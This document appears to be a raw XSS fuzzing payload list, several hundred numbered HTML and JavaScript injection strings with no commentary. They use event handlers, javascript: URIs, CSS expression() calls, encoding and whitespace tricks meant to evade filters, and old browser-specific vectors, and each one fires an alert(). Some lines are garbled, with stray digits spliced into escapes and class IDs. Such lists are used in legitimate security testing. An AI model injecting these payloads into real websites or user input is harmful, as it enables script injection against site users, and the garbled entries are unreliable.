<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1432)"></html onMouseEnter>
<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1433)"></body onBeforeUnload>
<html onMouseDown html onMouseDown="javascript:javascript:alert(1434)"></html onMouseDown>
<marquee onScroll marquee onScroll="javascript:javascript:alert(1435)"></marquee onScroll>
<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1436)"></xml onPropertyChange>
<frameset onBlur frameset onBlur="javascript:javascript:alert(1437)"></frameset onBlur>
<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1438)"></applet onReadyStateChange>
<svg onUnload svg onUnload="javascript:javascript:alert(1439)"></svg onUnload>
<html onMouseOut html onMouseOut="javascript:javascript:alert(1440)"></html onMouseOut>
<body onMouseMove body onMouseMove="javascript:javascript:alert(1441)"></body onMouseMove>
<body onResize body onResize="javascript:javascript:alert(1442)"></body onResize>
<object onError object onError="javascript:javascript:alert(1443)"></object onError>
<body onPopState body onPopState="javascript:javascript:alert(1444)"></body onPopState>
<html onMouseMove html onMouseMove="javascript:javascript:alert(1445)"></html onMouseMove>
<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1446)"></applet onreadystatechange>
<body onpagehide body onpagehide="javascript:javascript:alert(1447)"></body onpagehide>
<svg onunload svg onunload="javascript:javascript:alert(1448)"></svg onunload>
<applet onerror applet onerror="javascript:javascript:alert(1449)"></applet onerror>
<body onkeyup body onkeyup="javascript:javascript:alert(1450)"></body onkeyup>
<body onunload body onunload="javascript:javascript:alert(1451)"></body onunload>
<iframe onload iframe onload="javascript:javascript:alert(1452)"></iframe onload>
<body onload body onload="javascript:javascript:alert(1453)"></body onload>
<html onmouseover html onmouseover="javascript:javascript:alert(1454)"></html onmouseover>
<object onbeforeload object onbeforeload="javascript:javascript:alert(1455)"></object onbeforeload>
<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1456)"></body onbeforeunload>
<body onfocus body onfocus="javascript:javascript:alert(1457)"></body onfocus>
<body onkeydown body onkeydown="javascript:javascript:alert(1458)"></body onkeydown>
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1459)"></iframe onbeforeload>
<iframe src iframe src="javascript:javascript:alert(1460)"></iframe src>
<svg onload svg onload="javascript:javascript:alert(1461)"></svg onload>
<html onmousemove html onmousemove="javascript:javascript:alert(1462)"></html onmousemove>
<body onblur body onblur="javascript:javascript:alert(1463)"></body onblur>
\x3Cscript>javascript:alert()</script>
'"`><script>/* *\x2Fjavascript:alert(1465)// */</script>
<script>javascript:alert()</script\x0D
<script>javascript:alert()</script\x0A
<script>javascript:alert()</script\x0B
<script charset="\x22>javascript:alert(1469)</script>
<!--\x3E<img src=xxx:x onerror=javascript:alert()> -->
--><!-- ---> <img src=xxx:x onerror=javascript:alert()> -->
--><!-- --\x00> <img src=xxx:x onerror=javascript:alert()> -->
--><!-- --\x21473> <img src=xxx:x onerror=javascript:alert()> -->
--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert()> -->
`"'><img src='#\x27 onerror=javascript:alert(1475)>
<a href="javascript\x3Ajavascript:alert(1476)" id="fuzzelement1476">test</a>
"'`><p><svg><script>a='hello\x27;javascript:alert(1477)//';</script></p>
<a href="javas\x00cript:javascript:alert(1478)" id="fuzzelement1478">test</a>
<a href="javas\x07cript:javascript:alert(1479)" id="fuzzelement1479">test</a>
<a href="javas\x0Dcript:javascript:alert(1480)" id="fuzzelement1480">test</a>
<a href="javas\x0Acript:javascript:alert(1481)" id="fuzzelement1481">test</a>
<a href="javas\x08cript:javascript:alert(1482)" id="fuzzelement1482">test</a>
<a href="javas\x02cript:javascript:alert(1483)" id="fuzzelement1483">test</a>
<a href="javas\x03cript:javascript:alert(1484)" id="fuzzelement1484">test</a>
<a href="javas\x04cript:javascript:alert(1485)" id="fuzzelement1485">test</a>
<a href="javas\x01486cript:javascript:alert(1486)" id="fuzzelement1486">test</a>
<a href="javas\x05cript:javascript:alert(1487)" id="fuzzelement1487">test</a>
<a href="javas\x0Bcript:javascript:alert(1488)" id="fuzzelement1488">test</a>
<a href="javas\x09cript:javascript:alert(1489)" id="fuzzelement1489">test</a>
<a href="javas\x06cript:javascript:alert(1490)" id="fuzzelement1490">test</a>
<a href="javas\x0Ccript:javascript:alert(1491)" id="fuzzelement1491">test</a>
<script>/* *\x2A/javascript:alert(1492)// */</script>
<script>/* *\x00/javascript:alert(1493)// */</script>
<style></style\x3E<img src="about:blank" onerror=javascript:alert()//></style>
<style></style\x0D<img src="about:blank" onerror=javascript:alert()//></style>
<style></style\x09<img src="about:blank" onerror=javascript:alert()//></style>
<style></style\x20<img src="about:blank" onerror=javascript:alert()//></style>
<style></style\x0A<img src="about:blank" onerror=javascript:alert()//></style>
"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert();/*';">DEF
"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1500);/*';">DEF
<script>if("x\\xE1501\x96\x89".length==2) { javascript:alert(1501);}</script>
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1502);}</script>
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1503);}</script>
'`"><\x3Cscript>javascript:alert(1504)</script>
'`"><\x00script>javascript:alert(1505)</script>
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1506)>
"'`><\x00img src=xxx:x onerror=javascript:alert(1507)>
<script src="data:text/plain\x2Cjavascript:alert(1508)"></script>
<script src="data:\xD4\x8F,javascript:alert(1509)"></script>
<script src="data:\xE0\xA4\x98,javascript:alert(1510)"></script>
<script src="data:\xCB\x8F,javascript:alert(1511)"></script>
<script\x20type="text/javascript">javascript:alert(1512);</script>
<script\x3Etype="text/javascript">javascript:alert(1513);</script>
<script\x0Dtype="text/javascript">javascript:alert(1514);</script>
<script\x09type="text/javascript">javascript:alert(1515);</script>
<script\x0Ctype="text/javascript">javascript:alert(1516);</script>
<script\x2Ftype="text/javascript">javascript:alert(1517);</script>
<script\x0Atype="text/javascript">javascript:alert(1518);</script>
ABC<div style="x\x3Aexpression(javascript:alert(1519)">DEF
ABC<div style="x:expression\x5C(javascript:alert(1520)">DEF
ABC<div style="x:expression\x00(javascript:alert(1521)">DEF
ABC<div style="x:exp\x00ression(javascript:alert(1522)">DEF
ABC<div style="x:exp\x5Cression(javascript:alert(1523)">DEF
ABC<div style="x:\x0Aexpression(javascript:alert(1524)">DEF
ABC<div style="x:\x09expression(javascript:alert(1525)">DEF
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1526)">DEF
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1527)">DEF
ABC<div style="x:\xC2\xA0expression(javascript:alert(1528)">DEF
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1529)">DEF
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1530)">DEF
ABC<div style="x:\x0Dexpression(javascript:alert(1531)">DEF
ABC<div style="x:\x0Cexpression(javascript:alert(1532)">DEF
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1533)">DEF
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1534)">DEF
ABC<div style="x:\x20expression(javascript:alert(1535)">DEF
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1536)">DEF
ABC<div style="x:\x00expression(javascript:alert(1537)">DEF
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1538)">DEF
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1539)">DEF
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1540)">DEF
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1541)">DEF
ABC<div style="x:\x0Bexpression(javascript:alert(1542)">DEF
ABC<div style="x:\xE2\x80\x81543expression(javascript:alert(1543)">DEF
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1544)">DEF
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1545)">DEF
<a href="\x0Bjavascript:javascript:alert(1546)" id="fuzzelement1546">test</a>
<a href="\x0Fjavascript:javascript:alert(1547)" id="fuzzelement1547">test</a>
<a href="\xC2\xA0javascript:javascript:alert(1548)" id="fuzzelement1548">test</a>
<a href="\x05javascript:javascript:alert(1549)" id="fuzzelement1549">test</a>
<a href="\xE1550\xA0\x8Ejavascript:javascript:alert(1550)" id="fuzzelement1550">test</a>
<a href="\x15518javascript:javascript:alert(1551)" id="fuzzelement1551">test</a>
<a href="\x15521552javascript:javascript:alert(1552)" id="fuzzelement1552">test</a>
<a href="\xE2\x80\x88javascript:javascript:alert(1553)" id="fuzzelement1553">test</a>
<a href="\xE2\x80\x89javascript:javascript:alert(1554)" id="fuzzelement1554">test</a>
<a href="\xE2\x80\x80javascript:javascript:alert(1555)" id="fuzzelement1555">test</a>
<a href="\x15567javascript:javascript:alert(1556)" id="fuzzelement1556">test</a>
<a href="\x03javascript:javascript:alert(1557)" id="fuzzelement1557">test</a>
<a href="\x0Ejavascript:javascript:alert(1558)" id="fuzzelement1558">test</a>
<a href="\x1559Ajavascript:javascript:alert(1559)" id="fuzzelement1559">test</a>
<a href="\x00javascript:javascript:alert(1560)" id="fuzzelement1560">test</a>
<a href="\x15610javascript:javascript:alert(1561)" id="fuzzelement1561">test</a>
<a href="\xE2\x80\x82javascript:javascript:alert(1562)" id="fuzzelement1562">test</a>
<a href="\x20javascript:javascript:alert(1563)" id="fuzzelement1563">test</a>
<a href="\x15643javascript:javascript:alert(1564)" id="fuzzelement1564">test</a>
<a href="\x09javascript:javascript:alert(1565)" id="fuzzelement1565">test</a>
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1566)" id="fuzzelement1566">test</a>
<a href="\x15674javascript:javascript:alert(1567)" id="fuzzelement1567">test</a>
<a href="\x15689javascript:javascript:alert(1568)" id="fuzzelement1568">test</a>
<a href="\xE2\x80\xAFjavascript:javascript:alert(1569)" id="fuzzelement1569">test</a>
<a href="\x1570Fjavascript:javascript:alert(1570)" id="fuzzelement1570">test</a>
<a href="\xE2\x80\x81571javascript:javascript:alert(1571)" id="fuzzelement1571">test</a>
<a href="\x1572Djavascript:javascript:alert(1572)" id="fuzzelement1572">test</a>
<a href="\xE2\x80\x87javascript:javascript:alert(1573)" id="fuzzelement1573">test</a>
<a href="\x07javascript:javascript:alert(1574)" id="fuzzelement1574">test</a>
<a href="\xE1575\x9A\x80javascript:javascript:alert(1575)" id="fuzzelement1575">test</a>
<a href="\xE2\x80\x83javascript:javascript:alert(1576)" id="fuzzelement1576">test</a>
<a href="\x04javascript:javascript:alert(1577)" id="fuzzelement1577">test</a>
<a href="\x01578javascript:javascript:alert(1578)" id="fuzzelement1578">test</a>
<a href="\x08javascript:javascript:alert(1579)" id="fuzzelement1579">test</a>
<a href="\xE2\x80\x84javascript:javascript:alert(1580)" id="fuzzelement1580">test</a>
<a href="\xE2\x80\x86javascript:javascript:alert(1581)" id="fuzzelement1581">test</a>
<a href="\xE3\x80\x80javascript:javascript:alert(1582)" id="fuzzelement1582">test</a>
<a href="\x15832javascript:javascript:alert(1583)" id="fuzzelement1583">test</a>
<a href="\x0Djavascript:javascript:alert(1584)" id="fuzzelement1584">test</a>
<a href="\x0Ajavascript:javascript:alert(1585)" id="fuzzelement1585">test</a>
<a href="\x0Cjavascript:javascript:alert(1586)" id="fuzzelement1586">test</a>
<a href="\x15875javascript:javascript:alert(1587)" id="fuzzelement1587">test</a>
<a href="\xE2\x80\xA8javascript:javascript:alert(1588)" id="fuzzelement1588">test</a>
<a href="\x15896javascript:javascript:alert(1589)" id="fuzzelement1589">test</a>
<a href="\x02javascript:javascript:alert(1590)" id="fuzzelement1590">test</a>
<a href="\x1591Bjavascript:javascript:alert(1591)" id="fuzzelement1591">test</a>
<a href="\x06javascript:javascript:alert(1592)" id="fuzzelement1592">test</a>
<a href="\xE2\x80\xA9javascript:javascript:alert(1593)" id="fuzzelement1593">test</a>
<a href="\xE2\x80\x85javascript:javascript:alert(1594)" id="fuzzelement1594">test</a>
<a href="\x1595Ejavascript:javascript:alert(1595)" id="fuzzelement1595">test</a>
<a href="\xE2\x81596\x9Fjavascript:javascript:alert(1596)" id="fuzzelement1596">test</a>
<a href="\x1597Cjavascript:javascript:alert(1597)" id="fuzzelement1597">test</a>
<a href="javascript\x00:javascript:alert(1598)" id="fuzzelement1598">test</a>
<a href="javascript\x3A:javascript:alert(1599)" id="fuzzelement1599">test</a>
<a href="javascript\x09:javascript:alert(1600)" id="fuzzelement1600">test</a>
<a href="javascript\x0D:javascript:alert(1601)" id="fuzzelement1601">test</a>
<a href="javascript\x0A:javascript:alert(1602)" id="fuzzelement1602">test</a>
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1603)>
`"'><img src=xxx:x \x22onerror=javascript:alert(1604)>
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1605)>
`"'><img src=xxx:x \x0Donerror=javascript:alert(1606)>
`"'><img src=xxx:x \x2Fonerror=javascript:alert(1607)>
`"'><img src=xxx:x \x09onerror=javascript:alert(1608)>
`"'><img src=xxx:x \x0Conerror=javascript:alert(1609)>
`"'><img src=xxx:x \x00onerror=javascript:alert(1610)>
`"'><img src=xxx:x \x27onerror=javascript:alert(1611)>
`"'><img src=xxx:x \x20onerror=javascript:alert(1612)>
"`'><script>\x3Bjavascript:alert(1613)</script>
"`'><script>\x0Djavascript:alert(1614)</script>
"`'><script>\xEF\xBB\xBFjavascript:alert(1615)</script>
"`'><script>\xE2\x80\x81616javascript:alert(1616)</script>
"`'><script>\xE2\x80\x84javascript:alert(1617)</script>
"`'><script>\xE3\x80\x80javascript:alert(1618)</script>
"`'><script>\x09javascript:alert(1619)</script>
"`'><script>\xE2\x80\x89javascript:alert(1620)</script>
"`'><script>\xE2\x80\x85javascript:alert(1621)</script>
"`'><script>\xE2\x80\x88javascript:alert(1622)</script>
"`'><script>\x00javascript:alert(1623)</script>
"`'><script>\xE2\x80\xA8javascript:alert(1624)</script>
"`'><script>\xE2\x80\x8Ajavascript:alert(1625)</script>
"`'><script>\xE1626\x9A\x80javascript:alert(1626)</script>
"`'><script>\x0Cjavascript:alert(1627)</script>
"`'><script>\x2Bjavascript:alert(1628)</script>
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1629)</script>
"`'><script>-javascript:alert(1630)</script>
"`'><script>\x0Ajavascript:alert(1631)</script>
"`'><script>\xE2\x80\xAFjavascript:alert(1632)</script>
"`'><script>\x7Ejavascript:alert(1633)</script>
"`'><script>\xE2\x80\x87javascript:alert(1634)</script>
"`'><script>\xE2\x81635\x9Fjavascript:alert(1635)</script>
"`'><script>\xE2\x80\xA9javascript:alert(1636)</script>
"`'><script>\xC2\x85javascript:alert(1637)</script>
"`'><script>\xEF\xBF\xAEjavascript:alert(1638)</script>
"`'><script>\xE2\x80\x83javascript:alert(1639)</script>
"`'><script>\xE2\x80\x8Bjavascript:alert(1640)</script>
"`'><script>\xEF\xBF\xBEjavascript:alert(1641)</script>
"`'><script>\xE2\x80\x80javascript:alert(1642)</script>
"`'><script>\x21643javascript:alert(1643)</script>
"`'><script>\xE2\x80\x82javascript:alert(1644)</script>
"`'><script>\xE2\x80\x86javascript:alert(1645)</script>
"`'><script>\xE1646\xA0\x8Ejavascript:alert(1646)</script>
"`'><script>\x0Bjavascript:alert(1647)</script>
"`'><script>\x20javascript:alert(1648)</script>
"`'><script>\xC2\xA0javascript:alert(1649)</script>
"/><img/onerror=\x0Bjavascript:alert(1650)\x0Bsrc=xxx:x />
"/><img/onerror=\x22javascript:alert(1651)\x22src=xxx:x />
"/><img/onerror=\x09javascript:alert(1652)\x09src=xxx:x />
"/><img/onerror=\x27javascript:alert(1653)\x27src=xxx:x />
"/><img/onerror=\x0Ajavascript:alert(1654)\x0Asrc=xxx:x />
"/><img/onerror=\x0Cjavascript:alert(1655)\x0Csrc=xxx:x />
"/><img/onerror=\x0Djavascript:alert(1656)\x0Dsrc=xxx:x />
"/><img/onerror=\x60javascript:alert(1657)\x60src=xxx:x />
"/><img/onerror=\x20javascript:alert(1658)\x20src=xxx:x />
<script\x2F>javascript:alert(1659)</script>
<script\x20>javascript:alert(1660)</script>
<script\x0D>javascript:alert(1661)</script>
<script\x0A>javascript:alert(1662)</script>
<script\x0C>javascript:alert(1663)</script>
<script\x00>javascript:alert(1664)</script>
<script\x09>javascript:alert(1665)</script>
"><img src=x onerror=javascript:alert(1666)>
"><img src=x onerror=javascript:alert(1667)>
"><img src=x onerror=javascript:alert(1668)>
"><img src=x onerror=javascript:alert(1669)>
"><img src=x onerror=javascript:alert(1670))>
"><img src=x onerror=javascript:alert(1671))>
"><img src=x onerror=javascript:alert(1672))>
"><img src=x onerror=javascript:alert(1673)>
"><img src=x onerror=javascript:alert(1674))>
"><img src=x onerror=javascript:alert(1675))>
"><img src=x onerror=javascript:alert(1676)>
"><img src=x onerror=javascript:alert(1677))>
"><img src=x onerror=javascript:alert(1678)>
"><img src=x onerror=javascript:alert(1679))>
"><img src=x onerror=javascript:alert(1680)>
`"'><img src=xxx:x onerror\x0B=javascript:alert(1681)>
`"'><img src=xxx:x onerror\x00=javascript:alert(1682)>
`"'><img src=xxx:x onerror\x0C=javascript:alert(1683)>
`"'><img src=xxx:x onerror\x0D=javascript:alert(1684)>
`"'><img src=xxx:x onerror\x20=javascript:alert(1685)>
`"'><img src=xxx:x onerror\x0A=javascript:alert(1686)>
`"'><img src=xxx:x onerror\x09=javascript:alert(1687)>
<script>javascript:alert(1688)<\x00/script>
<img src=# onerror\x3D"javascript:alert(1689)" >
<input onfocus=javascript:alert(1690) autofocus>
<input onblur=javascript:alert(1691) autofocus><input autofocus>
<video poster=javascript:javascript:alert(1692)//
<body onscroll=javascript:alert(1693)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form id=test onforminput=javascript:alert(1694)><input></form><button form=test onformchange=javascript:alert(1694)>X
<video><source onerror="javascript:javascript:alert(1695)">
<video onerror="javascript:javascript:alert(1696)"><source>
<form><button formaction="javascript:javascript:alert(1697)">X
<body oninput=javascript:alert(1698)><input autofocus>
<math href="javascript:javascript:alert(1699)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1699)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1700)>
<table background="javascript:javascript:alert(1701)">
<!--<img src="--><img src=x onerror=javascript:alert(1702)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(1703))//">
<![><img src="]><img src=x onerror=javascript:alert(1704)//">
<style><img src="</style><img src=x onerror=javascript:alert(1705)//">
<li style=list-style:url() onerror=javascript:alert(1706)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1706)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1707)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1708)</SCRIPT>
<OBJECT CLASSID="clsid:333C7BC4-460F-17091709D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1709)"></OBJECT>
<b <script>alert(1712)</script>0
<div id="div1713"><input value="``onmouseover=javascript:alert(1713)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1713").innerHTML;</script>
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1714)//'>
<embed src="javascript:alert(1715)">
<img src="javascript:alert(1716)">
<image src="javascript:alert(1717)">
<script src="javascript:alert(1718)">
<div style=width:1719px;filter:glow onfilterchange=javascript:alert(1719)>x
<? foo="><script>javascript:alert(1720)</script>">
<! foo="><script>javascript:alert(1721)</script>">
</ foo="><script>javascript:alert(1722)</script>">
<? foo="><x foo='?><script>javascript:alert(1723)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1724)</script>">
<% foo><x foo="%><script>javascript:alert(1725)</script>">
<div id=d><x xmlns="><iframe onload=javascript:alert(1726)"></div> <script>d.innerHTML=d.innerHTML</script>
<img \x00src=x onerror="alert(1727)">
<img \x47src=x onerror="javascript:alert(1728)">
<img \x17291729src=x onerror="javascript:alert(1729)">
<img \x17302src=x onerror="javascript:alert(1730)">
<img\x47src=x onerror="javascript:alert(1731)">
<img\x17320src=x onerror="javascript:alert(1732)">
<img\x17333src=x onerror="javascript:alert(1733)">
<img\x32src=x onerror="javascript:alert(1734)">
<img\x47src=x onerror="javascript:alert(1735)">
<img\x17361736src=x onerror="javascript:alert(1736)">
<img \x47src=x onerror="javascript:alert(1737)">
<img \x34src=x onerror="javascript:alert(1738)">
<img \x39src=x onerror="javascript:alert(1739)">
<img \x00src=x onerror="javascript:alert(1740)">
<img src\x09=x onerror="javascript:alert(1741)">
<img src\x17420=x onerror="javascript:alert(1742)">
<img src\x17433=x onerror="javascript:alert(1743)">
<img src\x32=x onerror="javascript:alert(1744)">
<img src\x17452=x onerror="javascript:alert(1745)">
<img src\x17461746=x onerror="javascript:alert(1746)">
<img src\x00=x onerror="javascript:alert(1747)">
<img src\x47=x onerror="javascript:alert(1748)">
<img src=x\x09onerror="javascript:alert(1749)">
<img src=x\x17500onerror="javascript:alert(1750)">
<img src=x\x17511751onerror="javascript:alert(1751)">
<img src=x\x17522onerror="javascript:alert(1752)">
<img src=x\x17533onerror="javascript:alert(1753)">
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1754)">
<img src=x onerror=\x09"javascript:alert(1755)">
<img src=x onerror=\x17560"javascript:alert(1756)">
<img src=x onerror=\x17571757"javascript:alert(1757)">
<img src=x onerror=\x17582"javascript:alert(1758)">
<img src=x onerror=\x32"javascript:alert(1759)">
<img src=x onerror=\x00"javascript:alert(1760)">
<a href=java&#1761&#2&#3&#4&#5&#6&#7&#8&#17611761&#17612script:javascript:alert(1761)>XXX</a>
<img src="x` `<script>javascript:alert(1762)</script>"` `>
<img src onerror /" '"= alt=javascript:alert(1763)//">
<title onpropertychange=javascript:alert(1764)></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1765)></a>">
<!--[if]><script>javascript:alert(1766)</script -->
<!--[if<img src=x onerror=javascript:alert(1767)//]> -->
<object id="x" classid="clsid:CB927D17702-4FF7-4a9e-A177069-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17707-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1770)" style="behavior:url(#x);"><param name=postdomevents /></object>
<a style="-o-link:'javascript:javascript:alert(1771)';-o-link-source:current">X
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1772)'}{}*{-o-link-source:current}]{color:red};</style>
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1773))%7d
<style>@import "data:,*%7bx:expression(javascript:alert(1774))%7D";</style>
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1775);">XXX</a></a><a href="javascript:javascript:alert(1775)">XXX</a>
<// style=x:expression\28javascript:alert(1779)\29>
<style>*{x:expression(javascript:alert(1780))}</style>
<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1782));">X
<script>({set/**/$($){_/**/setter=$,_=javascript:alert()}}).$=eval</script>
<script>({:#=eval/##/##(javascript:alert())})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert()}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][].constructor._('javascript:alert(1791)')()</script>
<meta charset="mac-farsi">¼script¾javascript:alert()¼/script¾
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert()` >
<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41796vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert()&gt;`>
<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert()&gt;>
<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert() strokecolor=white strokeweight=1799000px from= to= /></a>
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1800)">XXX</a>
<event-source src="%(event)s" onload="javascript:alert(1803)">
<a href="javascript:javascript:alert(1804)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#18051805;src=x:x&#18051805;onerror&#18051805;=javascript:alert(1805)&gt;">
<script>javascript:alert()</script>
<IMG SRC="javascript:javascript:alert(1810);">
<IMG SRC=javascript:javascript:alert()>
<IMG SRC=`javascript:javascript:alert()`>
<FRAMESET><FRAME SRC="javascript:javascript:alert(1814);"></FRAMESET>
<BODY ONLOAD=javascript:alert()>
<BODY ONLOAD=javascript:javascript:alert()>
<IMG SRC="jav ascript:javascript:alert(1817);">
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert()>
<IMG SRC="javascript:javascript:alert(1821)"
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1823);">
<IMG DYNSRC="javascript:javascript:alert(1824)">
<IMG LOWSRC="javascript:javascript:alert(1825)">
<BGSOUND SRC="javascript:javascript:alert(1826);">
<BR SIZE="&{javascript:alert(1827)}">
<LINK REL="stylesheet" HREF="javascript:javascript:alert(1829);">
<STYLE>li {list-style-image: url("javascript:javascript:alert(1833)");}</STYLE><UL><LI>XSS
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1834);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1835);">
<IFRAME SRC="javascript:javascript:alert(1836);"></IFRAME>
<TABLE BACKGROUND="javascript:javascript:alert(1837)">
<TABLE><TD BACKGROUND="javascript:javascript:alert(1838)">
<DIV STYLE="background-image: url(javascript:javascript:alert(1839))">
<DIV STYLE="width:expression(javascript:alert(1840));">
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1841))">
<XSS STYLE="xss:expression(javascript:alert(1842))">
<STYLE TYPE="text/javascript">javascript:alert();</STYLE>
<STYLE>.XSS{background-image:url("javascript:javascript:alert(1844)");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1845)")}</STYLE>
<!--[if gte IE ]><SCRIPT>javascript:alert();</SCRIPT><![endif]-->
<BASE HREF="javascript:javascript:alert(1847);//">
<OBJECT classid=clsid:ae24fdae-03c6-18491849d1849-8b76-0080c744f389><param name=url value=javascript:javascript:alert()></OBJECT>
<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1850)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1851)&lt;/SCRIPT&gt;"></BODY></HTML>
<form id="test" /><button form="test" formaction="javascript:javascript:alert(1854)">X
<body onscroll=javascript:alert()><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<P STYLE="behavior:url('#default#time2')" end="" onEnd="javascript:alert(1856)">
<STYLE>a{background:url('s1858' 's2)}@import javascript:javascript:alert(1858);');}</STYLE>
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert()&&;&&<&&/script&&>
<SCRIPT onreadystatechange=javascript:javascript:alert();></SCRIPT>
<style onreadystatechange=javascript:javascript:alert();></style>
<?xml version="1862.0"?><html:html xmlns:html='http://www.w3.org/1862999/xhtml'><html:script>javascript:alert();</html:script></html:html>
<embed code=javascript:javascript:alert();></embed>
<frameset onload=javascript:javascript:alert()></frameset>
<object onerror=javascript:javascript:alert()>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1869);">]]</C><X></xml>
<IMG SRC=&{javascript:alert();};>
<a href="jav&#65ascript:javascript:alert(1871)">test1871</a>
<a href="jav&#97ascript:javascript:alert(1872)">test1872</a>
<iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1874)&amp;gt;>">
';alert(1875))//';alert())//";
alert())//";alert(1876))//--
></SCRIPT>">'><SCRIPT>alert(1877))</SCRIPT>
<IMG SRC="javascript:alert(1880);">
<IMG SRC=javascript:alert()>
<IMG SRC=JaVaScRiPt:alert()>
<IMG SRC=javascript:alert()>
<IMG SRC=`javascript:alert()`>
<a onmouseover="alert(1885)">xxs link</a>
<a onmouseover=alert()>xxs link</a>
<IMG """><SCRIPT>alert(1887)</SCRIPT>">
<IMG SRC=javascript:alert())>
<IMG SRC=# onmouseover="alert(1889)">
<IMG SRC= onmouseover="alert(1890)">
<IMG onmouseover="alert(1891)">
<IMG SRC="jav ascript:alert(1895);">
<IMG SRC="jav ascript:alert(1896);">
<IMG SRC="jav ascript:alert(1897);">
<IMG SRC="jav ascript:alert(1898);">
perl -e 'print "<IMG SRC=java\0script:alert(1899)>";' > out
<IMG SRC=" &#14; javascript:alert(1900);">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert()>
<<SCRIPT>alert();//<</SCRIPT>
<IMG SRC="javascript:alert(1907)"
\";alert(1909);//
